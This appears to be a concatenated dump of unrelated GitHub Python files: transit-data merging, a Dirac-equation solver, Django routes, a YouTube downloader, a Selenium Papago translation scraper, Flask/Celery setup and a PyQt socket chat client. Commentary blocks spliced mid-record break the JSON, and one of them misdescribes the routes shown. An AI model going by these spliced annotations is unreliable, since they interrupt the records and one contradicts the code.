pd.read_csv(ls_dir[0],compression='gzip',dtype=TU_DTYPES)\n    # Sort the dataframe\n    df = df.sort_values(by=['id','stop_sequence'])\n\n    # Progress step (guarded so folders with fewer than 10 files do not divide by zero)\n    step = max(1, len(ls_dir) // 10)\n\n    # Loop from the second csv file within the folder\n    for i in range(1,len(ls_dir)):\n        # Read the csv file\n        this_df = pd.read_csv(ls_dir[i],compression='gzip',dtype=TU_DTYPES)\n        this_df = this_df.sort_values(by=['id','stop_sequence'])\n        # Concat with existing data\n        # Only keep the latest trip update.\n        df = pd.concat([df,this_df],ignore_index=True).drop_duplicates(['trip_id', 'stop_sequence'],keep='last')\n\n        # Print progress\n        if i % step == 0:\n            print((i // step)*10,'% Complete!')\n\n    df = df.sort_values(by=['id','stop_sequence'])\n    # Save csv file\n    df.to_csv(dir_dest,index=False,compression='gzip')\n\n    # Get current time\n    tEnd = datetime.now()\n\n    # Print information\n    print(full_file_name, 'is completed at:', tEnd.isoformat(' ', 'seconds') + '; Run 
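# The merge loop above implements "last write wins" de-duplication: files are
# concatenated in sorted (chronological) order and only the latest update per
# (trip_id, stop_sequence) pair is kept. A self-contained sketch of the same
# pattern on toy data:
import pandas as pd

a = pd.DataFrame({'trip_id': ['t1', 't1'], 'stop_sequence': [1, 2], 'delay': [10, 20]})
b = pd.DataFrame({'trip_id': ['t1'], 'stop_sequence': [2], 'delay': [35]})  # newer update
merged = pd.concat([a, b], ignore_index=True).drop_duplicates(
    ['trip_id', 'stop_sequence'], keep='last')
# merged now holds delay 35 for (t1, 2): the later file replaced the earlier row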
Time:', tEnd-tStart)\n\n    # Exit\n    sys.exit()\n","repo_name":"teckkean/GTFS-Data-Pipeline-TfNSW-Bus","sub_path":"GTFS_DPL_v2/tu_all_steps_folder.py","file_name":"tu_all_steps_folder.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"4736090002","text":"from vampyr import vampyr3d as vp\nfrom orbital4c import orbital as orb\nfrom orbital4c import nuclear_potential as nucpot\nfrom orbital4c import complex_fcn as cf\nimport numpy as np\nfrom scipy.special import legendre, laguerre, erf, gamma\nfrom scipy.constants import hbar\n\nimport argparse\nimport numpy.linalg as LA\nimport sys, getopt\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Collecting all data to start the program.')\n    parser.add_argument('-d', '--dtype', dest='dtype', type=str, default='dirac',\n                        help='Dirac or Dirac-square operators')\n    parser.add_argument('-v', '--potential', dest='potential', type=str, default='point_charge',\n                        help='tell me which model for V you want to use: point_charge, coulomb_HFYGB, homogeneus_charge_sphere, gaussian')\n    args = parser.parse_args()\n\n    assert args.potential in ['point_charge', 'coulomb_HFYGB', 'homogeneus_charge_sphere', 'gaussian'], 'Please, specify V'\n    assert args.dtype in ['dirac', 'dirac2'], 'Please, specify Dirac-type operator'\n\ndef analytic_1s(light_speed, n, k, Z):\n    alpha = 1/light_speed\n    gamma = orb.compute_gamma(k,Z,alpha)\n    tmp1 = n - np.abs(k) + gamma\n    tmp2 = Z * alpha / tmp1\n    tmp3 = 1 + tmp2**2\n    return light_speed**2 / np.sqrt(tmp3)\n\n\nlight_speed = 137.03599913900001\nalpha = 1/light_speed\nk = -1\nl = 0\nn = 1\nm = 0.5\nZ = 1\natom = 'H'\n\nenergy_1s = analytic_1s(light_speed, n, k, Z)\nprint('Exact Energy',energy_1s - light_speed**2)\n\nmra = vp.MultiResolutionAnalysis(box=[-60,60], order=6)\nprec = 1.0e-4\norigin1 = [0.1, 0.2, -0.7] # origin moved to avoid placing the nuclear charge on a node\norigin2 = [0.1, 0.2, 1.3]  # origin moved to avoid placing the nuclear charge on a node\n\n################### Define V potential ######################\nif args.potential == 'point_charge':\n    def VH2(x, origin1, origin2, Z1, Z2):\n        V1 = nucpot.point_charge(x, origin1, Z1)\n        V2 = nucpot.point_charge(x, origin2, Z2)\n        return V1 + V2\n    f = lambda x: VH2(x, origin1, origin2, Z, Z)\nelif args.potential == 'coulomb_HFYGB':\n    def VH2(x, origin1, origin2, Z1, Z2, prec):\n        V1 = nucpot.coulomb_HFYGB(x, origin1, Z1, prec)\n        V2 = nucpot.coulomb_HFYGB(x, origin2, Z2, prec)\n        return V1 + V2\n    f = lambda x: VH2(x, origin1, origin2, Z, Z, prec)\nelif args.potential == 'homogeneus_charge_sphere':\n    def VH2(x, origin1, origin2, Z1, Z2, atom):\n        V1 = nucpot.homogeneus_charge_sphere(x, origin1, Z1, atom)\n        V2 = nucpot.homogeneus_charge_sphere(x, origin2, Z2, atom)\n        return V1 + V2\n    f = lambda x: VH2(x, origin1, origin2, Z, Z, atom)\nelif args.potential == 'gaussian':\n    def VH2(x, origin1, origin2, Z1, Z2):\n        V1 = nucpot.gaussian(x, origin1, Z1, atom)\n        V2 = nucpot.gaussian(x, origin2, Z2, atom)\n        return V1 + V2\n    f = lambda x: VH2(x, origin1, origin2, Z, Z, atom)\n\nPeps = vp.ScalingProjector(mra,prec/10)\nV_tree = Peps(f)\nprint('V_tree', V_tree)\nprint('Define V Potential', args.potential, 'DONE')\n\norb.orbital4c.light_speed = light_speed\norb.orbital4c.mra = mra\ncf.complex_fcn.mra = mra\n\na_coeff = 3.0\nb_coeff = np.sqrt(a_coeff/np.pi)**3\ngauss1 = vp.GaussFunc(b_coeff, a_coeff, origin1)\ngauss2 = 
vp.GaussFunc(b_coeff, a_coeff, origin2)\ngauss1_tree = vp.FunctionTree(mra)\ngauss2_tree = vp.FunctionTree(mra)\nvp.advanced.build_grid(out=gauss1_tree, inp=gauss1)\nvp.advanced.project(prec=prec, out=gauss1_tree, inp=gauss1)\nvp.advanced.build_grid(out=gauss2_tree, inp=gauss2)\nvp.advanced.project(prec=prec, out=gauss2_tree, inp=gauss2)\n\nh2p_orb = gauss1_tree + gauss2_tree\nh2p_orb.normalize()\n\nspinor_H = orb.orbital4c()\nLa_comp = cf.complex_fcn()\nLa_comp.copy_fcns(real = h2p_orb)\nspinor_H.copy_components(La = La_comp)\nspinor_H.init_small_components(prec/10)\nspinor_H.normalize()\n\nprint(\"spinor_H\")\nprint(spinor_H)\n\nderivative = 'BS'\n\nerror_norm = 1\nc2 = light_speed * light_speed\n\nif args.dtype == 'dirac':\n while error_norm > prec:\n hd_psi = orb.apply_dirac_hamiltonian(spinor_H, prec, der = derivative)\n v_psi = orb.apply_potential(-1.0, V_tree, spinor_H, prec)\n add_psi = hd_psi + v_psi\n energy = spinor_H.dot(add_psi).real\n print('Energy =',energy - light_speed**2)\n mu = orb.calc_dirac_mu(energy, light_speed)\n tmp = orb.apply_helmholtz(v_psi, mu, prec)\n tmp.crop(prec/10)\n new_orbital = orb.apply_dirac_hamiltonian(tmp, prec, energy, der = derivative)\n new_orbital.crop(prec/10)\n new_orbital.normalize()\n delta_psi = new_orbital - spinor_H\n deltasq = delta_psi.squaredNorm()\n error_norm = np.sqrt(deltasq)\n print('Error =', error_norm)\n spinor_H = new_orbital\n \n hd_psi = orb.apply_dirac_hamiltonian(spinor_H, prec, der = derivative)\n v_psi = orb.apply_potential(-1.0, V_tree, spinor_H, prec)\n add_psi = hd_psi + v_psi\n energy = spinor_H.dot(add_psi).real\n print('Final Energy =',energy - light_speed**2)\n\nelif args.dtype == 'dirac2':\n while error_norm > prec:\n v_psi = orb.apply_potential(-1.0, V_tree, spinor_H, prec) \n vv_psi = orb.apply_potential(-0.5/c2, V_tree, v_psi, prec)\n beta_v_psi = v_psi.beta2()\n apV_psi = v_psi.alpha_p(prec, derivative)\n ap_psi = spinor_H.alpha_p(prec, derivative)\n Vap_psi = orb.apply_potential(-1.0, V_tree, ap_psi, prec)\n anticom = apV_psi + Vap_psi\n RHS = beta_v_psi + vv_psi + anticom * (0.5/light_speed)\n cke = spinor_H.classicT()\n cpe = (spinor_H.dot(RHS)).real\n print(\"Classic-like energies:\", \"cke =\", cke,\"cpe =\", cpe,\"cke + cpe =\", cke + cpe)\n mu = orb.calc_non_rel_mu(cke+cpe)\n print(\"mu =\", mu)\n new_orbital = orb.apply_helmholtz(RHS, mu, prec)\n new_orbital.normalize()\n delta_psi = new_orbital - spinor_H\n deltasq = delta_psi.squaredNorm()\n error_norm = np.sqrt(deltasq)\n print(\"Error =\", error_norm)\n spinor_H = new_orbital\n \n hd_psi = orb.apply_dirac_hamiltonian(spinor_H, prec, der = derivative)\n v_psi = orb.apply_potential(-1.0, V_tree, spinor_H, prec)\n add_psi = hd_psi + v_psi\n energy = spinor_H.dot(add_psi).real\n \n cke = spinor_H.classicT()\n beta_v_psi = v_psi.beta2()\n beta_pot = (beta_v_psi.dot(spinor_H)).real\n pot_sq = (v_psi.dot(v_psi)).real\n ap_psi = spinor_H.alpha_p(prec, derivative)\n anticom = (ap_psi.dot(v_psi)).real\n energy_kutzelnigg = cke + beta_pot + pot_sq/(2*c2) + anticom/light_speed\n \n print('Kutzelnigg =',cke, beta_pot, pot_sq/(2*c2), anticom/light_speed, energy_kutzelnigg)\n print('Quadratic approx =',energy_kutzelnigg - energy_kutzelnigg**2/(2*c2))\n print('Correct from Kutzelnigg =', c2*(np.sqrt(1+2*energy_kutzelnigg/c2)-1))\n print('Final Energy =',energy - light_speed**2)\n \n energy_1s = analytic_1s(light_speed, n, k, Z)\n \n print('Exact Energy =',energy_1s - light_speed**2)\n print('Difference 1 =',energy_1s - energy)\n print('Difference 2 =',energy_1s - 
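# Both branches of the H2+ solver above follow the same fixed-point structure: apply the
# potential, solve for a new orbital with a Helmholtz/Green's-function step at the current
# energy, normalize, and iterate until the orbital change drops below prec. A generic
# sketch of that loop; every callable here is a placeholder, not the orbital4c API:
def scf_iterate(psi, apply_V, apply_green, energy_of, normalize, diff_norm, prec):
    error = 1.0
    while error > prec:
        v_psi = apply_V(psi)
        psi_new = apply_green(v_psi, energy_of(psi))  # Helmholtz step at current energy
        psi_new = normalize(psi_new)
        error = diff_norm(psi_new, psi)  # convergence measured on the orbital update
        psi = psi_new
    return psi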
energy_kutzelnigg - light_speed**2)\n","repo_name":"MRChemSoft/ReMRChem","sub_path":"H2+.py","file_name":"H2+.py","file_ext":"py","file_size_in_byte":7127,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"6941298198","text":"from django.urls import path\nfrom .views import *\nfrom django.contrib.auth import views as auth_views\n\nurlpatterns=[\n    path('', home, name='home'),\n    path('notes/', notes, name=\"notes\"),\n    # this path takes one to a specific note and deletes it\n    path('delete_note/<int:pk>/', delete_note, name=\"delete_note\"),\n    # this path references a generic view hence '.as_view'\n    path('notes_view/<int:pk>/', NotesDetailView.as_view(), name=\"notes_detail\"),\n    \n    path('homework/', homework, name=\"homework\"),\n    path('update_homework/', update_homework, name=\"update_homework\"),\n    path('delete_homework/<int:pk>/', delete_homework, name=\"delete_homework\"),\n\n    path('youtube/', youtube, name=\"youtube\"),\n\n    path('todo/', todo, name=\"todo\"),\n    path('update_todo/', update_todo, name=\"update_todo\"),\n    path('delete_todo/<int:pk>/', delete_todo, name=\"delete_todo\"),\n\n    path('books/', books, name=\"books\"),\n\n    path('dictionary/', dictionary, name='dictionary'),\n\n    path('wiki/', wiki, name='wiki'),\n\n    path('conversion/', conversion, name=\"conversion\"),\n] \n","repo_name":"Eugene-Kwaka/MasomoYanguPortal","sub_path":"masomoyangu/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6180940234","text":"from pytube import YouTube\nfrom os import rename\n\nytInput = input('Enter a YouTube link: ')\nyt = YouTube(ytInput)\n\n# Provide info about the video.\nprint(f'''\nTitle: {yt.title}\nViews: {yt.views}\nRating: {yt.rating}\n''')\n\nformatInput = input('Get the video or the audio: ')\nif formatInput.lower() == 'video':\n    stream = yt.streams.filter(progressive=True).get_highest_resolution()\nelif formatInput.lower() == 'audio':\n    stream = yt.streams.filter(only_audio=True)[0]\nelse:\n    print('Invalid type. 
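# In the urlpatterns above, Django's angle-bracket path converters (e.g. <int:pk>) are
# what capture the object id for the delete/detail routes; the <...> tokens are easily
# eaten by HTML-unaware tooling, which is why several routes read 'delete_note//'.
# A minimal, self-contained example of the intended pattern (view name hypothetical):
from django.urls import path
from django.http import HttpResponse

def delete_item(request, pk):
    return HttpResponse(f'deleted {pk}')

urlpatterns = [
    # <int:pk> matches one integer URL segment and passes it to the view as pk
    path('delete_item/<int:pk>/', delete_item, name='delete_item'),
]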
Please, start over.')\n    exit()\n\nprint('Downloading...')\nstream.download()\nif formatInput.lower() == 'audio':\n    rename(f'{(yt.title.replace(\"/\", \"\"))}.mp4', f'{(yt.title.replace(\"/\", \"\"))}.mp3')\n\nprint('Downloaded!')\n","repo_name":"ThePhoDit/YTDownloader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12134068819","text":"import os\nimport warnings\nfrom pyvirtualdisplay import Display\n\ntry:\n    ORIGIN_DISP = os.environ['DISPLAY']\nexcept KeyError:\n    warnings.warn('''You may be running the process in docker, which has no X server.\n    We may set the DISPLAY env to an empty str to avoid an exception''')\n    ORIGIN_DISP = ''  # fall back to an empty string when running in Docker\nDISP = Display(visible=False, size=(1400, 900))\nDISP.start()\nVIRTUAL_DISP = os.environ['DISPLAY']\nos.environ['DISPLAY'] = ORIGIN_DISP\n\n\ndef virtual_display(func):\n    def wrapper(*args, **kwargs):\n        os.environ['DISPLAY'] = VIRTUAL_DISP\n        try:\n            return func(*args, **kwargs)  # propagate the wrapped function's result\n        finally:\n            os.environ['DISPLAY'] = ORIGIN_DISP  # restore even if func raises\n    return wrapper\n","repo_name":"tphanson/gym-agent","sub_path":"env/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73758289702","text":"import numpy as np\nimport pandas as pd\nimport os\nimport sys\nfrom collections import OrderedDict as odict\n\nfrom util.mnkhelpers import bits2boards as b2b\n\nimport clean as cl\n\nclass HVHData():\n    def __init__(self, folder):\n        self.original_columns = ['index', 'subject', 'color', 'gi', 'mi', \\\n                                 'status', 'bp', 'wp', 'response', 'rt', \\\n                                 'time', 'mouse_t', 'mouse_x']\n        self.full_output_columns = ['subject', 'is_comp', 'color', 'status', \\\n                                    'bp', 'wp', 'response', 'rt', 'gi', 'mi', \\\n                                    'computer', 'human', 'time', 'a', 'b', \\\n                                    'aval', 'bval', 'val']\n        self.game_model_columns = ['subject', 'color', 'bp', 'wp', 'response', 'rt']\n\n\n    def load_file(self, folder, file_name, mouse=False):\n        \"\"\" Initial preparation of data for individual files \"\"\"\n\n        # load file, drop nuisance columns, remove non-observations\n        drop_cols = ['index'] if mouse else ['index', 'mouse_t', 'mouse_x']\n        data = pd.read_csv(folder + file_name, names=self.original_columns).drop(drop_cols, axis=1)\n        drop_status = (data.status != 'dummy') & (data.status != 'ready') & (data.status != 'draw offer')\n        data = data.loc[drop_status, :].copy().reset_index(drop=True)\n\n        # assign unique subject label (from filename) and create separate cols for humans and computers\n        sub_filter = data.rt > 0\n        comp_filter = data.rt == 0\n        first_move_filter = (data.mi == 0) & (data.gi%2 == 0)\n        second_move_filter = (data.mi == 1) & (data.gi%2 == 0)\n\n        data.loc[data.rt > 0, 'subject'] = file_name[:-4]\n        data.loc[:, 'human'] = file_name[:-4]\n        data.loc[:, 'computer'] = np.nan\n        data.loc[comp_filter, 'computer'] = data.loc[comp_filter, 'subject']\n        data.loc[first_move_filter, 'computer'] = data.loc[second_move_filter, 'computer']\n        data.loc[:, 'computer'] = data.loc[:, 'computer'].fillna(method='ffill')\n        data.loc[0, 'computer'] = data.loc[1, 'computer']\n\n        return data\n\n\n\n\n\ndef clean(csv_file, subject_dict):\n    cols = [\"index\", \"gi\", \"mi\", \"status\", \"player\", \"color\", \"response\", \"bp\", \"wp\", \"rt\", \"time\", \"IP\"]\n    data = pd.read_csv(csv_file, names=cols)\n    data = data.loc[(data.status != 'dummy') & (data.status != 'ready') & (data.status != 'draw 
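# Usage sketch for the virtual_display decorator above: any call that needs an X display
# runs against the pyvirtualdisplay server instead of the real one. The function body is
# illustrative, not from the original project:
@virtual_display
def capture_frame(env):
    return env.render(mode='rgb_array')  # rendering happens on the virtual display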
offer') & (data.status != 'time loss')]\n    data.loc[:, \"bplen\"] = [len(data.loc[i, 'bp']) for i in data.index.values]\n    data.loc[:, \"wplen\"] = [len(data.loc[i, 'wp']) for i in data.index.values]\n    data = data.loc[(data.bplen == 36) & (data.wplen == 36) & (data.response != 36)]\n    data.mi = data.mi - 1\n    data.rt = data.rt / 1000\n    cmap = {'B':0, 'W':1}\n    smap = {'in progress':'playing', 'win':'win', 'draw':'draw'}\n    data[\"color\"] = data.color.map(cmap)\n    data[\"status\"] = data.status.map(smap)\n    data[\"subject\"] = data.IP.map(subject_dict)\n    data = data.drop([\"bplen\", \"wplen\", \"index\", \"player\", \"IP\"], axis=1).reset_index(drop=True)\n    for i in data.index.values:\n        if data.loc[i,'color'] == 0:\n            temp = list(data.loc[i,'bp'])\n            temp[int(data.loc[i,'response'])] = '0'\n            data.loc[i, 'bp'] = \"\".join(temp)\n        else:\n            temp = list(data.loc[i,'wp'])\n            temp[int(data.loc[i,'response'])] = '0'\n            data.loc[i, 'wp'] = \"\".join(temp)\n\n    reindex_list = [\"subject\",\"color\",\"gi\",\"mi\",\"status\",\"bp\",\"wp\",\"response\",\"rt\",'time']\n    data = data.reindex(columns=reindex_list)\n    return data\n","repo_name":"galbiati/mnk-cleaning-analysis","sub_path":"src/clean_hvh.py","file_name":"clean_hvh.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73268818979","text":"import random\n\n\nclass EpsilonDecay:\n\n    def __init__(self, start, end, steps):\n        self.start = start\n        self.end = end\n        self.e = self.start\n        self.steps = steps\n        self.decay = -((self.start - self.end) / self.steps)\n\n    def eval(self):\n        t = False\n        if random.random() < self.e:\n            t = True\n\n        self.e = max(self.end, self.e + self.decay)\n        return t","repo_name":"cair/deep-line-wars","sub_path":"deep_line_wars_examples/per_rl/sampling/epsilon_decay.py","file_name":"epsilon_decay.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"22109030071","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('testimonial', '0006_testimonialitem_order'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='testimonialitem',\n            name='name',\n            field=models.TextField(blank=True),\n        ),\n    ]\n","repo_name":"betoncombat/betoncombat","sub_path":"testimonial/migrations/0007_testimonialitem_name.py","file_name":"0007_testimonialitem_name.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29683540052","text":"from .. 
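# Usage sketch for the EpsilonDecay schedule above: eval() returns True with probability
# e (explore) and anneals e linearly from start down to end over `steps` calls, after
# which it stays clamped at end. Numbers below are illustrative:
schedule = EpsilonDecay(start=1.0, end=0.1, steps=10_000)
for step in range(20_000):
    if schedule.eval():
        pass  # explore: pick a random action
    else:
        pass  # exploit: pick the greedy action
# after 10_000 calls, schedule.e remains clamped at 0.1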
import db\n\ngbans = db.gbans\nnotes = db.notes\nwarns = db.warns\napproved = db.approved\n\n\nasync def log_warn(userid: int,count: int):\n await warns.update_one(\n {'USERID':userid},\n {'$set':{\n 'WARNCOUNT':count\n }},upsert=True\n )\n\nasync def get_warn(userid):\n data = await warns.find_one({'USERID':userid})\n return data\n\nasync def del_warn(userid):\n if await get_warn(userid):\n await warns.delete_one({'USERID':userid})\n else:pass\n\nasync def is_approved(userid):\n data = await approved.find_one({'USERID':userid})\n return True if data else False\n\nasync def approve_user(userid):\n if await is_approved(userid):return False\n await approved.insert_one({'USERID':userid})\n return True\n\nasync def disapprove_user(userid):\n if not await is_approved(userid):return False\n await approved.delete_one({'USERID':userid})\n return True\n\nasync def save_note(notename,data):\n notename = notename.lower().strip()\n await notes.update_one(\n {'NOTENAME':notename},\n {'$set':{\n 'META':data\n }},upsert=True\n )\n\nasync def del_note(notename):\n data = await notes.find_one({'NOTENAME':notename})\n if not data:return False\n await notes.delete_one({'NOTENAME':notename})\n return True\n\nasync def get_notes():\n names = []\n async for x in notes.find({}):\n names.append(x['NOTENAME'])\n return names\n\nasync def get_a_note(notename):\n notename = notename.lower().strip()\n data = await notes.find_one({'NOTENAME':notename})\n return data['META'] if data else None\n\n","repo_name":"maxaret24/nebulus","sub_path":"ub/core/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"9364009039","text":"from selenium import webdriver\nfrom time import sleep\nfrom bs4 import BeautifulSoup\n\nbrowser = webdriver.Chrome(\"../chromdriver/chromedriver.exe\")\nbrowser.maximize_window()\n\nbrowser.get(\"https://papago.naver.com/\")\n\nf = open(\"../files/naver_movie_code.txt\", 'r', encoding=\"UTF-8\")\n\nnum = 0\nmovie_codes = []\nmovie_names = []\n\nwhile True:\n temp = f.readline().split('\\n')[0]\n\n if temp == '':\n break\n\n if num % 2 == 1:\n movie_codes.append(temp)\n else:\n movie_names.append(temp)\n\n num = num + 1\n\nf.close()\n\nsleep(5)\n\nfor cnt in range(len(movie_codes)):\n \n f = open(\"../reviews/naver_movie_review_\" + str(cnt + 1) + \"_\" + movie_codes[cnt] + \".txt\", 'r', encoding=\"UTF-8\")\n\n reviews = f.read().split('\\n')[1:-1]\n f.close()\n\n f = open(\"../translation/naver_movie_review_\" + str(cnt + 1) + \"_\" + movie_codes[cnt] + \".txt\", 'w', encoding=\"UTF-8\")\n f.write(movie_names[cnt] + '\\n')\n f.close()\n\n for i in range(len(reviews)):\n try:\n f = open(\"../translation/naver_movie_review_\" + str(cnt + 1) + \"_\" + movie_codes[cnt] + \".txt\", 'a', encoding=\"UTF-8\")\n\n review = reviews[i].split(',')\n review[1] = ','.join(review[1:])\n review = review[:2]\n\n if review[1] == '':\n print('평점: ' + review[0])\n print('한글 리뷰: ' + review[1])\n print('영어 리뷰: ' + review[1])\n print()\n\n f.write(review[0] + ',')\n f.write(review[1] + '\\n')\n\n f.close()\n continue\n\n browser.find_element_by_xpath(\"/html/body/div/div/div[1]/section/div/div[1]/div[1]/div/div[3]/label\").click()\n browser.find_element_by_xpath(\"/html/body/div/div/div[1]/section/div/div[1]/div[1]/div/div[3]/label\").send_keys(review[1])\n browser.find_element_by_xpath(\"/html/body/div/div/div[1]/section/div/div[1]/div[1]/div/div[4]/div/button\").click()\n \n sleep(5)\n\n soup = 
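# Usage sketch for the async helpers above. They are coroutines (the collections look
# like an async Mongo driver such as motor), so they must be awaited inside an event
# loop. Assumes it runs in the same module; the user id is made up:
import asyncio

async def demo():
    if not await is_approved(12345):
        await approve_user(12345)
    await save_note('rules', 'be kind')
    print(await get_a_note('rules'))

asyncio.run(demo())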
BeautifulSoup(browser.page_source, \"lxml\")\n result = soup.find(\"div\", attrs={\"id\":\"txtTarget\"}).find(\"span\").text\n\n print('평점: ' + review[0])\n print('한글 리뷰: ' + review[1])\n print('영어 리뷰: ' + result)\n print()\n\n f.write(review[0] + ',')\n f.write(result + '\\n')\n\n browser.find_element_by_xpath(\"/html/body/div/div/div[1]/section/div/div[1]/div[1]/div/div[3]/label/textarea\").click()\n browser.find_element_by_xpath(\"/html/body/div/div/div[1]/section/div/div[1]/div[1]/div/div[3]/label/textarea\").clear()\n \n f.close()\n except:\n f.close()","repo_name":"KiHyeon-Hong/Naver_movie_review_transfer_learning","sub_path":"src/naver_movie_review_translation.py","file_name":"naver_movie_review_translation.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4075501320","text":"from collections import deque\r\n\r\nqueue = deque()\r\n\r\nfor q in range(int(input())):\r\n command = input()\r\n if command.startswith(\"1\"):\r\n queue.append(int(command.split()[1]))\r\n else:\r\n if queue:\r\n if command == \"2\":\r\n queue.pop()\r\n elif command == \"3\":\r\n print(max(queue))\r\n elif command == \"4\":\r\n print(min(queue))\r\n\r\nrev_q = []\r\n\r\nwhile queue:\r\n rev_q.append(str(queue.pop()))\r\nprint(\", \".join(rev_q))","repo_name":"naskk202/demo_projects","sub_path":"advance/stacks_and_queues/max_and_min_elements.py","file_name":"max_and_min_elements.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37423186536","text":"from flask import Flask\nfrom flask_bcrypt import Bcrypt\nfrom flask_login import LoginManager\nfrom flask_sqlalchemy import SQLAlchemy\nfrom celery import Celery\n\nfrom flask_mail import Mail\nfrom flaskblog.config import Config\n\napp = Flask(__name__)\napp.config.from_object(Config)\n\ndb = SQLAlchemy()\nbcrypt = Bcrypt()\nlogin_manager = LoginManager()\nlogin_manager.login_view = \"users.login\"\nlogin_manager.login_message_category = \"info\"\nmail = Mail()\n\n\ndb.init_app(app)\nbcrypt.init_app(app)\nlogin_manager.init_app(app)\nmail.init_app(app)\n\n\ndef make_celery(app):\n celery = Celery(\n app.import_name,\n broker=\"redis://redis:6379/0\",\n backend=\"redis://redis:6379/1\",\n include=[\"flaskblog.users.utils\"],\n )\n celery.conf.update(app.config)\n\n class ContextTask(celery.Task):\n def __call__(self, *args, **kwargs):\n with app.app_context():\n return self.run(*args, **kwargs)\n\n celery.Task = ContextTask\n return celery\n\n\ncelery_app = make_celery(app)\n\n\ndef create_app():\n from flaskblog.users.routes import users\n from flaskblog.posts.routes import posts\n from flaskblog.main.routes import main\n from flaskblog.errors.handlers import errors\n\n app.register_blueprint(users)\n app.register_blueprint(posts)\n app.register_blueprint(main)\n app.register_blueprint(errors)\n\n return app\n","repo_name":"kangheeyong/TEST-flask-blog","sub_path":"web/flaskblog/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21374514721","text":"# -*- coding: utf-8 -*-\n# @Time: 21:10\nfrom PyQt5.QtWidgets import QMainWindow, QFileDialog\n\nfrom Utils.GetCurrentTime import get_time\nfrom Utils.GetMyIP import get_my_lan_ip\nfrom Utils.AESencode import encrypt, decrypt\nfrom Utils.ECCmisc import get_key, ECC_encrypt, 
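# Usage sketch for the make_celery factory above: the ContextTask subclass wraps every
# task body in app.app_context(), so tasks can use Flask extensions (db, mail) directly.
# The task name and body are illustrative, not from the original project:
from flaskblog import celery_app, mail

@celery_app.task
def send_async_email(subject, recipients):
    # runs inside app.app_context() thanks to ContextTask
    from flask_mail import Message
    mail.send(Message(subject, recipients=recipients))

# enqueue from a request handler:
# send_async_email.delay('Welcome!', ['user@example.com'])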
ECC_decrypt, ip_str2int\nfrom UI.QuickChat import Ui_MainWindow\n\nimport socket\nimport threading\nimport pyaudio\nimport random\nimport string\nimport pathlib\nimport struct\nimport json\nimport time\n\nimport datetime\n\n\nclass AudioClient(QMainWindow, Ui_MainWindow):\n    def __init__(self):\n        # super(Client, self).__init__()\n        super().__init__()\n        self.setupUi(self)\n\n        self.s_audio = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.s_control = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.s_text = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.s_file = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.s_cert = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.s_multi = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n        # SlotFunc\n        # voice transmission\n        self.btn_CTServer.clicked.connect(self.connect_to_server)\n        self.btn_DTServer.clicked.connect(self.disconnect_to_server)\n        self.btn_StartAudio.clicked.connect(self.start_audio)\n        self.btn_CloseAudio.clicked.connect(self.close_audio)\n        self.btn_Clear.clicked.connect(self.clear_info)\n\n        # establish a connection: send the ip of the peer to chat with\n        self.btn_Connect.clicked.connect(self.build_connection)\n\n        # start scanning and receive the ips that are online\n        self.btn_Scan.clicked.connect(self.start_to_scan)\n\n        # send text\n        self.btn_SendText.clicked.connect(self.send_text)\n\n        # refresh the chat box\n        self.btn_Refresh.clicked.connect(self.refresh_chat_box)\n\n        # send a file\n        self.btn_SendFile.clicked.connect(self.send_file_action)\n\n        # group chat\n        self.btn_Refresh_2.clicked.connect(self.refresh_multi_chat_box)\n        self.btn_MultiSendText.clicked.connect(self.send_multi_text)\n\n        self.chunk_size = 1024 # 512\n        self.audio_format = pyaudio.paInt16\n        self.channels = 1\n        self.rate = 20000\n        self.target_ip = \"\"\n        self.target_audio_port = 0\n        self.target_control_port = 0\n        self.target_text_port = 0\n        self.target_file_port = 0\n        self.target_cert_port = 0\n        self.target_multi_port = 0\n\n        self.AudioInfoText = \"\"\n        self.is_send_audio = False\n        self.is_receive_audio = False\n        self.is_connected = False\n        self.is_receive_text = False\n        self.is_send_cert = False\n        self.is_receive_file = False\n        self.is_receive_multi_text = False\n\n        self.connect_ip_data = \"\"\n        self.scan_requirement = \"Requirement for scanning all online sockets\"\n        self.offline_requirement = \"Requirement for deleting my socket\"\n\n        self.p = pyaudio.PyAudio()\n        self.playing_stream = 0\n        self.recording_stream = 